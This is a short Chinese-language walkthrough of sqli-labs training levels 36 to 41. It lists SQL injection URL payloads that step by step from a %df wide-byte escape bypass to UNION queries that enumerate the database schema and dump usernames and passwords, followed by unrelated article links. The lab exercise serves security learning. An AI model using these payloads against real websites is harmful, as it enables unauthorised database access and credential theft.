当前位置: 首页 > news >正文

sqli-labs靶场less36-less40

less36

1.我们打开靶场之后打开来看一下,输入的内容会被转义,依旧是宽字节注入

2.使用以下宽字节注入,使用的是%df

?id=-1%df%27%20union%20select%201,database(),3--+

3.剩余内容与前面关卡基本一样,只要使用上面的方法合成宽字节即可

less37

1.我们打开靶场之后打开来看一下,它依旧告诉我们输入的内容会被转义,且有登录框

2.我们可以看到需要进行抓包,然后就可以在数据包里面输入以下语句,我们依旧使用%df进行转义

?id=-1%df%27%20union%20select%201,database(),3--+

3.剩余的内容与之前一样,做法与上面相同

less38

1.我们打开靶场之后打开来看一下

2.这一关我们可以使用联和注入来做,语句如下

?id=-1' union select 1,2,3--+
?id=-1' union select 1,2,database()--+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1' union select 1,2,group_concat(username,password) from users--+

less39

1.我们打开靶场之后打开来看一下

2.我们可以继续使用联合注入来做,不过闭合方式为数字型的,语句如下

?id=-1 union select 1,2,3--+

3.方法和上面一样,语句与上一关基本一样

less40

1.我们打开靶场之后打开来看一下

2.这一关和上一关一样,不过是字符型,闭合方式为‘),语句如下

?id=1')union select 1,2,3--+

3.其余内容除闭合方式外和上一关一样

less41

1.这一关和39关一样为数字型注入

?id=-1 union select 1,2,3--+

2.其余做法和39关一样

http://www.dtcms.com/a/316898.html

相关文章:

  • 计算机二级java选择题真题【内附解析】
  • 页表实现机制,分页的缺点,三层页表的原理,页表的意义
  • 微软Dragon Ambient eXperience (DAX) 深度解析
  • mq_open系统调用及示例
  • 嵌入式ARM程序高级调试基础:2.举例说明中断处理时PC值和LR寄存器的具体关系?
  • 数据结构(三)双向链表
  • Linux的LVM逻辑卷管理操作指南
  • 网络编程异步connect学习
  • SpringCloud学习------Hystrix详解
  • java每日精进 8.04【文件管理细致分析】
  • 《手撕设计模式》系列导学目录
  • 仓颉编程语言的基本概念:标识符、变量、注释
  • 信息安全概述--实验总结
  • mcu中的RC振荡器(Resistor-Capacitor Oscillator)
  • 企业高性能web服务器
  • 【docker】UnionFS联合操作系统
  • 2025年渗透测试面试题总结-02(题目+回答)
  • 一种红外遥控RGB灯带控制器-最低价MCU
  • Redis类型之String
  • linux-单用户模式、营救模式
  • 高阶 RAG :技术体系串联与实际落地指南​
  • RHCA03--硬件监控及内核模块调优
  • 【Spring Cloud】-- RestTeplate实现远程调用
  • Java开发时出现的问题---并发与资源管理深层问题
  • 嵌入式开发学习———Linux环境下IO进程线程学习(四)
  • 《嵌入式数据结构笔记(三):数据结构基础与双向链表》
  • 应急响应排查思路
  • MLIR Bufferization
  • JWT 签名验证失败:Java 与 PHP 互操作问题解决方案
  • OpenHarmony 5.0 Settings中wifi删除密码立刻去输入密码连接,连接不上